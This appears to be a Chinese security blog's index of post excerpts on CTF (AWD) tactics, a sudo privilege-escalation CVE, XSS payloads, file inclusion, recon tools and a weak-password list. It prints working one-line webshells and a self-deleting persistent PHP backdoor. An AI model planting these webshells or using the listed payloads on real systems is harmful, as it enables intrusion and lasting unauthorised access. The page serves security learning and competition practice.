CVE-2021-3156 sudo提权漏洞
开源poc:https://github.com/blasty/CVE-2021-3156.git
影响版本:
1 2
Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1
不受影响版本:
1
sudo =>1.9.5p2
可用 sudo –version查看版本
判断方式:sudoedit -s / sudoedit开头报错表示存在CVE-2021-3156漏洞
下载解压
查看可用版本
根据自己靶机系统运行
获得sudo权限
第一次AWD
1.迅速使用winscp下载全部站,常见的路径为/var/www/、/app
使用d盾扫描,看一下哪个手快的大佬先行getshell
或者查看最近修改的文件
白嫖大佬在各个靶机里的木马,连接上找flag
2查看当前cms的版本,搜索相关漏洞
3不死马:
12345678910<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__); $file = 'fla2.php';$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; while (1){ <br> file_put_contents($file,$code); system('touch -m -d "2018-12-01 ...
弱口令Top100
123456
a123456a123456.123456a123456a.123456abc123456abc.abc123456abc123456.woaini1314woaini1314.qq123456qq123456.woaini520woaini520.woaini123woaini123.woaini521woaini521.qazwsxqazwsx.1qaz2wsx1qaz2wsx.1q2w3e4r1q2w3e4r.1q2w3e4r5t1q2w3e4r5t.1q2w3e1q2w3e.qwertyuiopqwertyuiop.zxcvbnmzxcvbnm.123456a123456123456a5201314111111woaini1314qq1234561231230000001qaz2wsx1q2w3e4rqwe1237758521123qwea123123123456aawoaini520woaini1002001314520woaini123123321q123456123456789123456789a5211314asd123a123456789z1234 ...
BurpSuite+Clash
Burpsuite上层代理功能:
Project Opitons选项下的Connections子选项,勾选Upstream Proxy Server这个板块
“Add”添加代理,这里Destination host是要指定使用代理ip的主机,输入*代表对所有主机使用代理
Proxy host是代理ip,这里我是以clash举例子,所以我写clash的本地IP,如果是其他的HTTP代理ip,就直接填写到这里,
Proxy port就是端口,clash的本地端口是7890,所以我这里写7890,其他HTTP代理ip的端口是啥,就写啥,最后一个选项,选择无就好,点击OK
W3AF简单应用
WGF是一个we应用安全的攻击、审计平台,通过增加插件来对功能进行扩展。这是一款用python写的工具,可以查看所有源代码。支持GUL,也支持命令行模式。
本框架拥有三种类型的插件:漏洞挖掘挖掘(discowe ry)、漏洞分析(aunit)和漏洞攻击(attack)。漏洞挖掘插件只负责一件事情:搜寻新的URL、表单和其它注入点(injection points)。Web spider便是一个经典的漏洞挖掘插件。这个插件以一个URL为输入,然后得到一个或多个注入点。当用户使用多个这种类型的插件时,这些插件会运行这样的循环:如果插件A在第一次运行时发现了一个新的URlL,w3af内核将这个urL传递给插件B。如果插件b发现了一个新的URL,它也将被发送给插件A。这个过程将一直持续下去,所有的插件都将运行工作,占用应用资源,直到无法运行漏洞挖掘应用。
漏洞分析插件则获取那些漏洞挖掘插件找到的注入点,为了发现漏洞,混洞分析插件会向所有可注入点发送特别设计的数据。例如使用一个漏洞分析插件来获取SQL注入的漏洞。漏涓攻击插件的作用是利用分析插件发现的漏洞。它们通常会得到一个远程服务器的shell ...
信息搜集
whois信息
子域名收集
端口信息收集
旁站、C段查询
目录扫描
CMS指纹识别
网站架构
整站分析:服务器系统类型、网站容器(Apache、NGINX、IIS、Tomcat)、脚本类型(jsp、asp、php)、数据库类型(mysql、Oracle、access)
地理位置查询
常用工具:
地理位置查询:
IP查询_专业精准的IP库服务商_IPIP
whois:
kali下的whois
https://www.chinaz.com/
站长之家http://whois.chinaz.com/
域名注册人收集:
https://www.chinaz.com/
子域名爆破:
https://www.zoomeye.org/钟馗之眼
https://chaziyu.com/查子域
域名挖掘机Layer
子域名枚举https://github.com/lijiejie/subDomainsBrute
https://www.52pojie.cn/forum.php?mod=viewthread&tid=894555&highlight=%D7%D3%D3%F2%C3%FB
ssl证书查询:
...
三种XSS
存储型:攻击者在页面上插入XSS代码,服务端将数据存入数据库,当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果。
反射型:攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
dom:攻击者在URL中插入XSS代码,前端页面直接从URL中获取XSS代码并且输出到页面,导致XSS代码的执行,攻击者将带有XSS代码的URL发送给用户,用户打开后受到XSS攻击。
alert("trick or treat!")
12/**<script>alert(1)</script> "><a href="javascript:alert(1)">alert</a> <"
大小写
双写
编码
修改type=”hidden”为button
鼠标事件(onclick=alert(1))
浅谈XSS攻击的那些事(附常用绕过姿势) - 知乎 ( ...
文件包含漏洞
include_once()如果该文件中的代码已经被包含了,则不会再次包含
include与require区别:
如果有错误,include会继续执行后面的。require则会停止
highlight_file() 函数对文件进行 PHP 语法高亮显示
PHP里用点拼接
PHP中addslashes函数是把单引号、双引号、反斜杠前添加反斜杠
file://—访问本地文件系统
http://—访问HTTP URL
ftp://—访问FTP URL
php://—访问各种I / O流
zlib://—压缩流
data://—数据(RFC 2397)
glob://—查找匹配模式的路径名
phar://— PHP存档
ssh2://—安全外壳2
rar://— RAR
ogg://—音频流
Expect://—流程交互流
能够打开并包含本地文 ...
常见的MIME类型
常见的白名单MIME TYPE扩展名 MIME TYPEjpg image/jpegpng image/pngtxt text/plainzip application/zipdoc application/msword
文件后缀
Mime类型
说明
.flv
flv/flv-flash
在线播放
.html或.htm
text/html
超文本标记语言文本
.rtf
application/rtf
RTF文本
.gif
image/gif
GIF图形
.jpeg或.jpg
image/jpeg
JPEG图形
.au
audio/basic
au声音文件
.mid或.midi
audio/midi或audio/x-midi
MIDI音乐文件
.ra或.ram或.rm
audio/x-pn-realaudio
RealAudio音乐文件
.mpg或.mpeg或.mp3
video/mpeg
MPE ...
常见的一句话木马
1234567asp一句话木马: <%execute(request("value"))%> php一句话木马: <?php @eval($_POST[value]);?> aspx一句话木马:<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
例:
12345678ASP:<%eval request("pass")%> ASPX:<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%> PHP:<?php eval(@$_POST['a']);?>JSP:<%Runtime.getRuntime().exec(request.getParamet ...